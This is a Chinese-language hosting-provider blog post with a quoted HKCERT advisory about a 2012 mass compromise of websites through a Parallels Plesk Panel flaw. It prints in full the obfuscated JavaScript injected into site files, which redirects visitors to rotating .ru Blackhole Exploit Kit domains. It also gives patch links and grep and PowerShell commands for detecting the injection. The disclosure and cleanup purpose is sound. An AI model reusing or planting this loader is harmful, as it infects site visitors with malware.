想不到,日前為了維護104民宿查號台的作業,意外發現ESET發出木馬植入警告!
根據該警告去追查那些檔案被感染了,才發現是某些js檔被植入了一些非正常的程式碼。


程式碼的範例如下:


/*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,192,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,684,505,582,580,606,345,648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}
/*qhk6sa6g1c*/

原來已經有很多人中標了!!

找了許多案例,但始終不得其解,總之是某個軟體有漏洞!!!

後來想到是不是PLESK有關,於是從它的知識庫找到一個相關的主題


[FIX] Remote vulnerability in Plesk Panel

先試試更新,再觀察後續有沒有問題再發生。

http://kb.parallels.com/en/113321

for Plesk 9.0 windo:
http://kb.parallels.com/112303

這位仁兄說是某個上傳軟體有漏洞:
http://www.udpwork.com/item/7665.html

[2012/09/07更新]
確定是plesk有漏洞,https://www.hkcert.org/my_url/zh/blog/12071901有一樣的問題,
保安博錄

Parallels Plesk Panel 管理平台漏洞,引起大規模網站入侵攻擊

發布日期: 19 / 07 / 2012
最後更新: 30 / 08 / 2012
Tweet   Share   |        
[439 觀看次數]

最 近有一位網站管理員向我們求助,他發現網站的首頁或 .js 檔案被黑客植入了惡意程式碼,這些惡意程式碼會在背後將瀏覽者導向至一些不明 .ru (俄羅斯)網站。這些網站都含有知名的 “Blackhole Exploit Kit” 攻擊碼 ,它會嘗試攻擊瀏覽者系統內的多個漏洞,包括:Java, Adobe Flash Player, Adobe Reader, 視窗說明中心等 (註1)。如果攻擊成功,它會下載惡意軟件到受影響系統。我們分析了被入侵網站內惡意程式碼,發現是近期一種由Parallels Plesk Panel 管理平台漏洞所引起的大規模網站入侵攻擊,受影響網站估計數以萬計。


 
 
 

Parallels Plesk Panel 管理平台漏洞

 
Parallels Plesk Panel 是其中一套被網站寄存公司廣泛採用的網站管理平台軟件,全球有超過25萬台伺服器使用這套軟件。目前,在舊版本的軟件(版本11之前)仍然是以沒有加密 (純文字)方式儲存密碼資料。在6月下旬開始,有黑客洞悉這個弱點,並配合該軟件的其他遠端 SQL 漏洞進行攻擊,可以盜取整台伺服器上所有網站的帳戶密碼。由7月開始,已經有黑客在一些網上論壇兜售針對這個漏洞的攻擊程式(註2) 。
 

圖 1: 黑客利用Parallels Plesk Panel 漏洞盜取網站帳戶密碼


 

黑客將惡意程式碼植入受影響帳戶的網站

 
黑 客獲得網站的帳戶密碼後,他可以登入Parallels Plesk Panel 管理平台,控制伺服器上的所有網站,包括變更/置換檔案內容。根據日誌記錄資料,你可能會發現黑客來自數個 IP 地址,在短時間內利用 Parallels Plesk Panel 內置的 File Manager 功能登入伺服器上的多個網站,進行上載或編輯檔案。
 
圖 2: 日誌記錄樣版
 
在受影響網站首頁或 .js檔案的最尾位置,會發現被植入以下特製的惡意程式碼,開端和結尾會由/*km0ae9gr6m*/和/*qhk6sa6g1c*/兩個註譯包圍。
 
圖 3: 惡意程式碼樣版 (圖片來源:unmaskparasites.com)
 
經過解密後 (註3),我們發現這些程式碼會依照日期和時間,每12小時隨機產生一個新 .ru 域名的網址
 
http:// <隨機產生域名>.ru /runforestrun?sid=cx
 
保安研究人員已證實黑客事前已預先登記這些域名作不法活動。當用戶的電腦瀏覽這些已植入惡意程式碼的網站,會在不自覺的情況下連接到上述 .ru 網站。網站內含有 “Blackhole Exploit Kit” 攻擊碼,可能令用戶的電腦感染惡意軟件。
 

如何保護

 
根據保安公司 Sucuri 資料 (註4) 估計,有超過5萬網站被入侵,而且數目日漸增加。為了保護網擁有人站或個人用戶避免受這次攻擊影響,我們有以下建議:
 

網站管理員適用的步驟

 
如果網站架設在 Linux 系統上,使用 “Grep” 指令測試網頁是否被植入惡意程式碼
 
cd <vhost 位置>
grep -rl --include=*.{php,js,html,htm} "km0ae9gr6m" *
 
如果網站架設在 Windows 系統上,使用 “Powershell” 指令測試網頁是否被植入惡意程式碼
 
cd <vhost 位置>
get-childitem .\ -include *.asp,*.aspx,*.php,*.js,*.html,*.htm -rec | select-string -pattern "km0ae9gr6m"
 
如果你的網頁被植入惡意程式碼,請以手動方式將惡意程式碼從網頁中移除。然後,聯絡你的網站寄存公司,參考以下”Parallels Plesk Panel 管理員適用的步驟”的建議進行處理。
 

Parallels Plesk Panel 管理員適用的步驟

 
如果你使用 Parallel Pleask Panel 11 之前版本,並且沒有安裝 “113321” 修補程式,可以參考 Parallels 提供解決方案 (註5) 。
  1. 安裝 “113321” 修補程式 (http://kb.parallels.com/113321)
  2. 重設所有帳戶密碼 (http://kb.parallels.com/en/113391),電郵密碼可以考慮括免
  3. 從 psa 資料庫移除 sessions 記錄
    mysql> delete from sessions;
  4. 移除伺服器內受影響檔案的惡意程式碼(http://forum.parallels.com/showpost.php?p=630228&postcount=24)

個人用戶適用的步驟

  1. 安裝保安軟件並保持更新
  2. 保持系統內軟件是最新版本

創作者介紹
創作者 NetPC虛擬主機 的頭像
NetPC虛擬主機

NetPC虛擬主機的部落格

NetPC虛擬主機 發表在 痞客邦 留言(0) 人氣()